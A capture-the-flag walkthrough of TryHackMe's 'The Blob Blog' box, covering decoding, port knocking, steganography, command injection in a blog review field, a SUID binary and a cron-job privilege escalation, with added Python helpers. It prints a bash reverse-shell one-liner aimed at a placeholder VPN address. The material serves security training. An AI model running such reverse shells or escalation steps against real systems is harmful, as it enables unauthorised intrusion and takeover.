The Blob Blog — TryHackMe — Writeup

TonyRahmos · 7 min read · Nov 27, 2020


Hello. I'm Rahmos. Here is my writeup for The Blob Blog on TryHackMe. Check it out!

First, deploy the machine and scan it with nmap. `-p-` covers all 65535 TCP ports (the interesting ports on this box are not in the default top 1000) and `-A` adds service and version detection:

nmap -A -p- -T4 -v <ip>

nmap

Two ports are open: 22 (SSH) and 80 (HTTP). Let's visit the website first:

website

It's the default Apache page. Check the page source (Ctrl + U):

page source

The source contains Bob's password, but Base58-encoded, and also a very long Base64 string at the top of the page. I'll decode the Base64 string with CyberChef (http://icyberchef.com):

base64

The decoded output is a Brainfuck program. Running it through a Brainfuck interpreter prints a sentence:

When I was a kid, my friends and I would always knock on 3 of our neighbors doors. Always houses 1, then 3, then 5!

I don't know what it's for yet, so I'll leave it for now.

Next, decode Bob's password from Base58:

decode Bob’s password
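Both decoding steps above (Base64 to Brainfuck to sentence, and Base58 to password) can be done offline without CyberChef. The following is an added example and not code from the original writeup: the Brainfuck program and the Base58 string in it are constructed samples, because the page's real strings only exist in the screenshots, and the Base58 alphabet is assumed to be the common Bitcoin one (digits 0, O, I and l excluded).

```python
import base64

# Assumed alphabet: the Bitcoin-style Base58 set (no 0, O, I, l).
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58_decode(text: str) -> bytes:
    """Decode Base58 (no checksum). Each leading '1' stands for one 0x00 byte."""
    num = 0
    for ch in text:
        idx = BASE58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"not a Base58 character: {ch!r}")
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def base58_encode(data: bytes) -> str:
    """Inverse of base58_decode, used here to sanity-check the decoder."""
    num = int.from_bytes(data, "big")
    out = ""
    while num:
        num, rem = divmod(num, 58)
        out = BASE58_ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, tape grows to the right.
    ',' (input) is treated as a no-op because the page's program only prints."""
    jump, stack = {}, []                      # matching-bracket table for O(1) jumps
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out, steps = [0], 0, 0, [], 0
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit reached; non-terminating program?")
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer moved below cell 0")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


# Constructed sample: a Brainfuck program that prints "knock" (cell1 = 10*10, then +7/+3/+1/-12/+8).
SAMPLE_BF = "++++++++++[>++++++++++<-]>+++++++.+++.+.------------.++++++++."
# The page hides the program behind a Base64 layer; reproduce that wrapping for the sample.
SAMPLE_B64 = base64.b64encode(SAMPLE_BF.encode()).decode()


def decode_page_comment(b64_text: str) -> str:
    """Base64 -> Brainfuck source -> run it -> the hidden sentence."""
    return run_brainfuck(base64.b64decode(b64_text).decode())


if __name__ == "__main__":
    print(decode_page_comment(SAMPLE_B64))   # constructed sample prints: knock
    print(base58_decode("8wr"))              # constructed sample decodes to: b'hi'
```

To use it on the real page, paste the long string from the HTML source into `decode_page_comment` and the short one into `base58_decode`; if the Base58 decoder raises on a character, the string is probably not Base58 at all (Base64 strings contain `0`, `O`, `I`, `l`, `+` or `/`, which Base58 never does).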

Now I've got Bob's password. Let's try to log in over SSH as bob:

ssh

Wait, it's not the SSH password! 😣

Take another look at the sentence above: it's about "knocking" and the numbers 1, 3 and 5. That is port knocking, so I'll use the knock client (shipped in the knockd package) to knock on those ports in order:

knockd

You can install it using apt:

apt-get install knockd

Then knock on the machine. The sequence has to be sent in exactly this order, and knock uses TCP by default:

knock <ip> 1 3 5

Then run nmap again:

nmap

Three more ports are open: 21 (FTP), 445 (HTTP) and 8080 (HTTP). If they show up closed again later, knockd may have timed the rule out; just repeat the knock.
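What the `knock` client does under the hood is nothing more than an ordered series of TCP connection attempts, which knockd picks up by sniffing the interface; the connections do not need to succeed. The following added example (not from the original writeup) parses the sequence out of the hint, sends the knocks with a small delay between them, and then checks the expected ports directly instead of rerunning a full scan. The hint text is copied from the sentence above; the target host and the ports checked afterwards are assumptions.

```python
import re
import socket
import time

# Copied from the decoded Brainfuck output on the page.
HINT = ("When I was a kid, my friends and I would always knock on 3 of our "
        "neighbors doors. Always houses 1, then 3, then 5!")


def parse_sequence(hint: str) -> list[int]:
    """Return the ordered knock sequence: the numbers after the word 'houses'.
    The '3' earlier in the sentence is a count of neighbours, not a port."""
    tail = hint.split("houses", 1)[1]
    return [int(n) for n in re.findall(r"\d+", tail)]


def knock(host: str, ports: list[int], delay: float = 0.2,
          timeout: float = 0.5) -> list[tuple[int, str]]:
    """Send one TCP connect attempt per port, in order, pausing between them.

    A refusal or timeout is the normal result: knockd watches the packets on the
    wire, it never needs an established connection. Order is what matters."""
    results = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results.append((port, "open"))
        except OSError as exc:        # ConnectionRefusedError, TimeoutError, ...
            results.append((port, type(exc).__name__))
        time.sleep(delay)
    return results


def is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Quick single-port check after knocking (cheaper than a full rescan)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # assumed target
    seq = parse_sequence(HINT)
    print("knocking", seq, "->", knock(target, seq))
    # Assumed ports to verify; on the page these appear after the knock.
    print({p: is_open(target, p) for p in (21, 445, 8080)})
```

Run it as `python3 knock.py <ip>`. If the ports still look closed, the usual causes are knocks sent too quickly for knockd's sequence timeout, or a knockd configured for UDP rather than TCP.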

So I guess the password from the page source is Bob's FTP password. Let's log in to FTP as bob:

ftp as bob

And yes, we're in! Let's look around for files:

view files

There's an image, cool.jpeg, inside /ftp/files. Transfer it to our machine with get:

get cool.jpeg

get

That's everything I can find on FTP. Now let's try to extract hidden data from the image with steghide:

steghide extract -sf cool.jpeg

However, steghide prompts for a passphrase, and without it nothing can be extracted.

steghide

So let's move on to the website on port 445:

port 445

I've got one more password. It looks like the passphrase for the data hidden in cool.jpeg. Let's try the extraction again:

steghide

And yes, it's the right passphrase. Let's read the extracted file:

out.txt

Another hidden directory appears. Open it on port 445:

hidden dir

Now I've got another password. What about the string starting with zcv:…? It looks encoded, so let's put it into CyberChef (icyberchef.com).

Decoding with the Vigenère recipe, using the password above as the key, gives:

decode

Boom! Now I've got Bob's credentials for the "blog". What I need to find next is where the blog login lives.
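The Vigenère step is simple enough to do locally, which also makes it easy to try every password collected so far as the key when it is not obvious which one was used. This is an added example, not code from the original writeup; the ciphertext and keys are constructed test values (the classic LEMON vector), since the page's real zcv:… string and password only appear in screenshots.

```python
import string

LETTERS = string.ascii_uppercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Classic Vigenère over A-Z. Case is preserved; characters that are not
    letters (the ':' in a user:pass string, spaces, digits) pass through and
    do not consume a key letter. Non-letters in the key are ignored."""
    shifts = [LETTERS.index(k.upper()) for k in key if k.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, ki = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        base = ord("A") if ch.isupper() else ord("a")
        shift = shifts[ki % len(shifts)]
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        ki += 1
    return "".join(out)


def try_keys(ciphertext: str, candidates: list[str]) -> dict[str, str]:
    """Decrypt once per candidate key, so every password found during the box
    can be tried in one go; the readable result is the right key."""
    return {k: vigenere(ciphertext, k, decrypt=True) for k in candidates}


# Constructed sample: the well-known ATTACKATDAWN / LEMON test vector.
CIPHERTEXT = "LXFOPVEFRNHR"

if __name__ == "__main__":
    for key, pt in try_keys(CIPHERTEXT, ["banana", "lemon"]).items():
        print(f"{key:>8}: {pt}")
```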

Let's scan for other hidden directories on port 445 with gobuster:

gobuster dir -u http://<ip>:445/ -w /path-to-wordlist

gobuster port 445

Let's look at /user:

/user

Is it a private SSH key? Not in this form: it isn't a valid RSA private key file. Leave it for now.

Access the website on port 8080:

port 8080

It's also the default Apache page. Again, scan for hidden directories with gobuster:

gobuster port 8080

Open /login:

/login

Ah yes! Here's the blog login. Enter the credentials from the Vigenère step:

/blog

I'm in! Let's put some text into the "Review me!" box, click submit and view the latest review:

My review was posted to /review. What if I put a command into the review…?

The command was executed, so the review field is an OS command injection point, and I can use it to get a reverse shell.
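The writeup doesn't show the blog's source, so the following is a constructed illustration (added here, not the page's or the blog's code) of the kind of handler that behaves this way: the review is pasted into a shell command string, so a `;` ends the intended command and whatever follows runs too, which is exactly how the reverse-shell one-liner below rides in. The fixed version keeps the feature but never hands the text to a shell. The payload uses a benign `id -u` in place of a reverse shell.

```python
import subprocess
import tempfile
from pathlib import Path

# Constructed payload: a harmless stand-in for the bash reverse-shell one-liner.
PAYLOAD = "great post; echo injected-uid-$(id -u)"


def store_review_vulnerable(review: str, log: Path) -> str:
    """Constructed: appends the review by building a shell command from user
    input. The ';' in the review terminates the echo and the rest runs as a
    separate command (here with the redirection attached to it)."""
    subprocess.run(f"echo {review} >> {log}", shell=True,
                   check=False, capture_output=True)
    return log.read_text(encoding="utf-8")


def store_review_fixed(review: str, log: Path) -> str:
    """Same feature without a shell: the review is data written by Python, so
    ';', '$(...)' and backticks are stored literally and never interpreted."""
    with log.open("a", encoding="utf-8") as fh:
        fh.write(review + "\n")
    return log.read_text(encoding="utf-8")


def demo() -> tuple[str, str]:
    """Run both handlers on the same payload and return what each stored."""
    with tempfile.TemporaryDirectory() as d:
        vuln = store_review_vulnerable(PAYLOAD, Path(d) / "vuln.txt")
        fixed = store_review_fixed(PAYLOAD, Path(d) / "fixed.txt")
    return vuln, fixed


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable handler stored:", repr(vuln))   # id -u was executed
    print("fixed handler stored:     ", repr(fixed))  # payload kept as text
```

The tell-tale from the attacker's side is the same as on the page: submit something with a side effect you can observe (a `sleep`, a DNS lookup, or a callback to your listener) and see whether it happens.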

First, start a listener on your attacking machine:

nc -lvnp 4444

Then enter this command as the review and submit it:

/bin/bash -c '/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1'

Then load /review and the shell connects back:

reverse shell

Upgrade to a tty shell with Python:

python -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

After a while, a message appears in the terminal:

message

So a cron job is running and writing this message to the terminal. I'll use pspy32 to watch the processes being spawned on the machine without needing root:

pspy32

Every minute a cron job compiles and runs a C program inside /home/bobloblaw/Documents, and also tars a backup into /tmp. I can't read bobloblaw's home directory yet, so let's copy the backup to my machine and extract it. I'll use scp (this pushes the file from the target to an SSH server on my attacking box, so replace username and <ip> with your own):

scp backup.tar.gz username@<ip>:/home/username

Extracting it gives a file called blobblog.txt. Let's read it:

blobblog.txt

It's the same key as the one at <ip>:445/user, so it's no use either 😣

Let's try another way. This time, use find to look for SUID binaries (the original command had `2>dev/null`, which creates a file named `null` in a `dev` directory instead of discarding errors; it must be `/dev/null`):

find / -perm -u=s -type f 2>/dev/null

find

This binary isn't a standard Linux one. Let's see what it does:

Hmm, it only prints this line? I doubt that. Transfer it to my machine (scp again) and decompile it with Ghidra:

ghidra

Run without the right arguments, the program prints "Order my blogs!". Given six arguments, it loops over them and compares each one against a counter (iVar1 in the decompilation) that steps through the arguments; any mismatch exits the program. The counter counts down, so the program wants the six numbers in reverse order. Providing "6 5 4 3 2 1" satisfies every check and it executes /bin/sh:

Ah yes! Now I have a shell as bobloblaw. Spawn a tty shell with Python again and look around for the first flag:

find

Get the first flag:

user.txt

Now let's find a way to get root. From pspy I know there's a cron job running a program in bobloblaw's Documents, so let's look there.

The .still_boring binary is run every minute as root. I can't modify the binary itself, but I can modify its source file, .boring_file.c, which the cron job recompiles each minute.

I'll edit the source to spawn a reverse shell; because the cron job runs it as root, the shell comes back as root. Here's my example code:

The blanked-out white box is your VPN IP. Save the file, start a listener on port 5555 and wait a minute for cron to recompile and run it:

root shell

Now I'm root! Get the final flag:

root.txt

The end.

HAPPY HACKING
